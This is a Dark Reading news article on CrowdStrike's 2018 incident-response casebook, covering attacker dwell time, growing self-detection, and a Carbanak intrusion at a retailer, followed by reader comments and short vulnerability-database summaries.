Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


08:50 AM
Connect Directly

CrowdStrike: More Organizations Now Self-Detect Their Own Cyberattacks

But it still takes an average of 85 days to spot one, the security firm's incident response investigations found.

The good news: Three-quarters of enterprises this year discovered on their own they had been hacked rather than learning from a third party. The bad news: It took them an average of 85 days to spot an attack.

That means hackers still have the upper hand. What's more, they only need less than two hours, on average, to move from the initially attacked machine to further inside a target's network, according to CrowdStrike, which today published its "Cyber Intrusion Services Casebook, 2018," a report on a sampling of its real-world incident response (IR) investigations for clients.

"We noticed attackers this year were pretty brazen and stealthy: Eighty-six days [before getting discovered] is still a problem," even when victim organizations are getting better at self-detection, says Tom Etheridge, vice president of services for CrowdStrike. The number of hacked organizations that spotted their own attacks rose 7% this year over those from CrowdStrike Services' IR engagements in 2017.

"It doesn't mean [organizations] are preventing breaches, but they have better tools and visibility for detecting breaches,” he says. "Dwell time is still a problem. So even though self-detection is getting better ... an attacker in the organization for 85 days is not ideal."

CrowdStrike recommends what it calls the 1-10-60 rule: Detect an attack on your organization within one minute, take 10 minutes to investigate it, and then remediate it within 60 minutes. "Organizations that can operate at this level will dramatically improve their chances of staying ahead of the adversary and stopping a potential breach from occurring," the company wrote in its case report.

Attacker Behavior
One-third of all the IR cases CrowdStrike investigated had employed social engineering and phishing - an increase of 11% over last year's cases. The main methods of social engineering were business email compromise (BEC) attacks and nation-states employing spear-phishing to gain a foothold in their targets' networks, according to the data. Plain, old commodity malware such as TrickBot was also a big tool used in many of the attacks to get an initial foothold into the networks - either to infiltrate further or to sell access to other cybercriminals or nation-state hackers for ransomware attacks, intellectual property theft, extortion, fraud, or cryptomining attacks.

"Commodity malware was really a precursor of another type of threat actor or to stay active [in the target's network]," Etheridge says. "They use [the malware] at a later date for other campaigns that monetize that access, or they sell that access to another threat actor toward its campaign to monetize IP or information."

The stealthiest attacks on organizations were ones that culled legitimate credentials from their targets and skillfully used them. CrowdStrike saw plenty of cases of attackers also employing legitimate tools in the victim's network, such as PowerShell and Windows Management Instrumentation, as another way to camouflage their activity.

"They remain dormant and take advantage of it for an extended period of time," Etheridge explains. "And they are understanding the tools the [target] has and knows them even better than they do."

Carbanak/Carbon Spider
Take the case of one of CrowdStrike's large retailer clients that was hacked by the infamous and sophisticated Carbanak, aka Carbon Spider, cybercrime organization. Carbanak had hidden inside the retailer's massive global network infrastructure for several years, waging a massive gift card fraud operation.

When the retailer finally noticed it had been breached, it called in CrowdStrike, which first spotted an administrative user's Office 365 mail account being used for credential harvesting. The attackers had abused the user's cached Active Directory Federated Services credentials and ran Mimikatz to steal other privileged accounts, including those of the retailer's ServiceNow account. Among other systems, Carbanak had access to the retailer's IT team systems to monitor and track changes to the network. It even had access to TeamViewer and ScreenConnect to spy on incident response and interact with targeted machine.

"This adversary employed a 'living off the land' methodology to remotely access systems, using system native and the same tools that the client's IT support teams used legitimately," CrowdStrike wrote in its report.

The Carbanak attackers even searched the retailer's ServiceNow IT ticketing system for information on gift cards.

"The customer had believed it had quelled the attack and extracted the attacker," Etheridge says. "But the attacker remained persistent in the customer's environment to monitor ServiceNow and to actually look at email traffic from the fraud department - all using legitimate credentials."

Remediate, Then Investigate
Some organizations, under pressure to get back up and running quickly after an attack, are choosing to remediate their systems after an attack before bringing in CrowdStrike to investigate it, Etheridge says. Those that take that approach typically aren't facing any monetary losses from the attack.

"They're looking to remediate before they investigate," he says. "There's a little bit of a balancing act for engaging the right solution for that account."

The risk with that approach is that an attacker could still remain hidden in the network. The best bet is for organization to plan for an attacker that just won't go away: "You need to make sure you maintain visibility and control" to monitor that, Etheridge  says, as well as deploy two-factor authentication to better protect credentials, and lock down infrastructure controls, such as firewall settings. Proactive threat hunting can also give organizations a leg up on a persistent attacker, he notes.

Related Content:

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Moderator
1/8/2019 | 12:52:29 AM
Stay vigilant and attentive
I am a little confused here - if it isn't your organization that detects that an attack is going on, who else would? The customers? I mean what's important here is that you should have a team that's vigilant against all attacks against your system and facility. That's the kind of service that you should be paying for in any case right?
User Rank: Strategist
1/2/2019 | 10:24:27 PM
Stepping up
It is good to see an increasing number of organisations really stepping up their cybersecurity game in view of recent hikes in data breaches. Hopefully this whole viewpoint would deter attackers to drill down the figures to a bare minimal. Perhaps it could take ages but at least we are seeing progress which is definitely a good start.
Inside the Ransomware Campaigns Targeting Exchange Servers
Kelly Sheridan, Staff Editor, Dark Reading,  4/2/2021
Beyond MITRE ATT&CK: The Case for a New Cyber Kill Chain
Rik Turner, Principal Analyst, Infrastructure Solutions, Omdia,  3/30/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-04-15
Sydent is a reference Matrix identity server. Sydent does not limit the size of requests it receives from HTTP clients. A malicious user could send an HTTP request with a very large body, leading to memory exhaustion and denial of service. Sydent also does not limit response size for requests it mak...
PUBLISHED: 2021-04-15
Sydent is a reference Matrix identity server. Sydent can be induced to send HTTP GET requests to internal systems, due to lack of parameter validation or IP address blacklisting. It is not possible to exfiltrate data or control request headers, but it might be possible to use the attack to perform a...
PUBLISHED: 2021-04-15
Sydent is a reference matrix identity server. A malicious user could abuse Sydent to send out arbitrary emails from the Sydent email address. This could be used to construct plausible phishing emails, for example. This issue has been fixed in 4469d1d.
PUBLISHED: 2021-04-15
Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has be...
PUBLISHED: 2021-04-15
The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to ...